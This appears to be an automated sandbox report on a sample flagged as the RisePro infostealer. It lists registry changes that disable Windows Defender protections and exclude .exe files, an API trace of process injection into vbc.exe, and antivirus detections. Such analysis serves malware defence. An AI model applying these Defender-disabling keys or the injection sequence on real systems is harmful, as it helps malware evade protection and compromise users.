description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{FFF846BA-99D4-4CA1-A396-5A61FB5857FD}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{FFF846BA-99D4-4CA1-A396-5A61FB5857FD}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DFE1A6BD-F212-4EB0-858F-F92AAE5118A5}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DFE1A6BD-F212-4EB0-858F-F92AAE5118A5}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DFE1A6BD-F212-4EB0-858F-F92AAE5118A5}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{FFF846BA-99D4-4CA1-A396-5A61FB5857FD}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DFE1A6BD-F212-4EB0-858F-F92AAE5118A5}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{FFF846BA-99D4-4CA1-A396-5A61FB5857FD}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DFE1A6BD-F212-4EB0-858F-F92AAE5118A5}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DFE1A6BD-F212-4EB0-858F-F92AAE5118A5}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{FFF846BA-99D4-4CA1-A396-5A61FB5857FD}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DFE1A6BD-F212-4EB0-858F-F92AAE5118A5}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{FFF846BA-99D4-4CA1-A396-5A61FB5857FD}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DFE1A6BD-F212-4EB0-858F-F92AAE5118A5}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 99 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 6, 2023, 2:03 p.m.	thread_handle: 0x00000000000003a0 suspend_count: 1 process_identifier: 2548	1	0
CreateProcessInternalW Sept. 6, 2023, 2:04 p.m.	thread_identifier: 1336 thread_handle: 0x0000000000000848 process_identifier: 1356 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\K0YrHneBJRok9kkcgxcVi1wX.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\K0YrHneBJRok9kkcgxcVi1wX.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\K0YrHneBJRok9kkcgxcVi1wX.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000864	1	1
CreateProcessInternalW Sept. 6, 2023, 2:04 p.m.	thread_identifier: 2516 thread_handle: 0x00000000000009e8 process_identifier: 2500 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\mAOUez2DUv07HLYgPAj9J3lL.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\mAOUez2DUv07HLYgPAj9J3lL.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\mAOUez2DUv07HLYgPAj9J3lL.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000a70	1	1
CreateProcessInternalW Sept. 6, 2023, 2:04 p.m.	thread_identifier: 2560 thread_handle: 0x0000000000000c30 process_identifier: 2564 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\roxaidHeyogEYigLYEhLdXte.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\roxaidHeyogEYigLYEhLdXte.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\roxaidHeyogEYigLYEhLdXte.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000c38	1	1
CreateProcessInternalW Sept. 6, 2023, 2:04 p.m.	thread_identifier: 2488 thread_handle: 0x0000000000000af4 process_identifier: 2520 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\VM_XuQhtwE4MZh2SBtXgFZit.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\VM_XuQhtwE4MZh2SBtXgFZit.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\VM_XuQhtwE4MZh2SBtXgFZit.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000ad0	1	1
CreateProcessInternalW Sept. 6, 2023, 2:04 p.m.	thread_identifier: 2568 thread_handle: 0x0000000000000c24 process_identifier: 2528 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\Fbvl4QloH4gG7tQ0zjEO4fTN.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\Fbvl4QloH4gG7tQ0zjEO4fTN.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\Fbvl4QloH4gG7tQ0zjEO4fTN.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000c1c	1	1
CreateProcessInternalW Sept. 6, 2023, 2:04 p.m.	thread_identifier: 2532 thread_handle: 0x0000000000000b60 process_identifier: 2536 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\UGF12yv5bvCGEXJmBLvQOV8c.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\UGF12yv5bvCGEXJmBLvQOV8c.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\UGF12yv5bvCGEXJmBLvQOV8c.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000b7c	1	1
CreateProcessInternalW Sept. 6, 2023, 2:04 p.m.	thread_identifier: 2540 thread_handle: 0x0000000000000b5c process_identifier: 2544 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\6emCr1XoWbH0qII1NEhQIfRv.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\6emCr1XoWbH0qII1NEhQIfRv.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\6emCr1XoWbH0qII1NEhQIfRv.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000b54	1	1
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x00000180 suspend_count: 1 process_identifier: 1356	1	0
CreateProcessInternalW Sept. 6, 2023, 2:04 p.m.	thread_identifier: 2280 thread_handle: 0x00000294 process_identifier: 2776 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\regsvr32.exe track: 1 command_line: "C:\Windows\System32\regsvr32.exe" /s UGU3D.TH /u filepath_r: C:\Windows\System32\regsvr32.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000274	1	1
CreateProcessInternalW Sept. 6, 2023, 1:58 p.m.	thread_identifier: 2532 thread_handle: 0x00000000000006c4 process_identifier: 2380 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\D445QVy6fBc8sYldcvsAOYlp.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\D445QVy6fBc8sYldcvsAOYlp.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\D445QVy6fBc8sYldcvsAOYlp.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000004d8	1	1
CreateProcessInternalW Sept. 6, 2023, 1:58 p.m.	thread_identifier: 2868 thread_handle: 0x00000000000007ec process_identifier: 2852 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\B4xOa2tIkWnlwQUw0ktE4tUz.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\B4xOa2tIkWnlwQUw0ktE4tUz.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\B4xOa2tIkWnlwQUw0ktE4tUz.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000007f8	1	1
CreateProcessInternalW Sept. 6, 2023, 2:04 p.m.	thread_identifier: 1608 thread_handle: 0x00000070 process_identifier: 1140 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000074	1	1
NtGetContextThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x00000070	1	0
NtAllocateVirtualMemory Sept. 6, 2023, 2:04 p.m.	process_identifier: 1140 region_size: 368640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000074	1	0
WriteProcessMemory Sept. 6, 2023, 2:04 p.m.	buffer: base_address: 0x00400000 process_identifier: 1140 process_handle: 0x00000074	1	1
WriteProcessMemory Sept. 6, 2023, 2:04 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 1140 process_handle: 0x00000074	1	1
NtSetContextThread Sept. 6, 2023, 2:04 p.m.	registers.eip: 1995571652 registers.esp: 3275672 registers.edi: 0 registers.eax: 4510606 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000070 process_identifier: 1140	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x00000070 suspend_count: 1 process_identifier: 1140	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 2528	1	0
NtGetContextThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000000e0	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2528	1	0
NtGetContextThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000000e0	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2528	1	0
NtGetContextThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000000e0	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000002dc suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x00000314 suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000003b8 suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x0000040c suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x00000460 suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000004c0 suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000004d8 suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000004ec suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x00000508 suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x00000520 suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x0000053c suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x00000548 suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x00000570 suspend_count: 1 process_identifier: 2528	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000005a4 suspend_count: 1 process_identifier: 2528	1	0
CreateProcessInternalW Sept. 6, 2023, 2:04 p.m.	thread_identifier: 2796 thread_handle: 0x0000001c process_identifier: 1380 current_directory: filepath: track: 1 command_line: .\Install.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000108	1	1
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2544	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2544	1	0
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2544	1	0

File has been identified by 44 AntiVirus engines on VirusTotal as malicious (44 events)

Bkav	W32.AIDetectMalware.64
Lionic	Trojan.Win32.RisePro.4!c
MicroWorld-eScan	Trojan.GenericKD.69068166
FireEye	Generic.mg.e8e7a7c1a9b0aba3
ALYac	Trojan.GenericKD.69068166
Cylance	unsafe
Zillya	Trojan.RisePro.Win32.27
Sangfor	Infostealer.Win32.Risepro.Vf59
Alibaba	TrojanPSW:Win32/RisePro.79db2e97
Arcabit	Trojan.Generic.D41DE586
Cyren	W64/ABRisk.MOUF-7104
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win64/Packed.VMProtect.J suspicious
Cynet	Malicious (score: 100)
APEX	Malicious
Kaspersky	Trojan-PSW.Win32.RisePro.bb
BitDefender	Trojan.GenericKD.69068166
NANO-Antivirus	Trojan.Win64.RisePro.jzivlo
Avast	Win64:Evo-gen [Trj]
Tencent	Malware.Win32.Gencirc.13edf9b4
Emsisoft	Trojan.GenericKD.69068166 (B)
F-Secure	Trojan.TR/Redcap.gaoee
VIPRE	Trojan.GenericKD.69068166
TrendMicro	Trojan.Win64.PRIVATELOADER.YXDH5Z
McAfee-GW-Edition	BehavesLike.Win64.Generic.wc
Sophos	Generic Reputation PUA (PUA)
Webroot	W32.Malware.Gen
Avira	TR/Redcap.gaoee
Antiy-AVL	Trojan/Win32.Sabsik
Gridinsoft	Trojan.Win64.Packed.sa
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	Trojan-PSW.Win32.RisePro.bb
GData	Trojan.GenericKD.69068166
Google	Detected
McAfee	Artemis!E8E7A7C1A9B0
MAX	malware (ai score=83)
Malwarebytes	Generic.Malware/Suspicious
TrendMicro-HouseCall	Trojan.Win64.PRIVATELOADER.YXDH5Z
Rising	Stealer.RisePro!8.176E1 (CLOUD)
MaxSecure	Trojan.Malware.217532095.susgen
AVG	Win64:Evo-gen [Trj]
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_100% (W)

WWW14_n.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All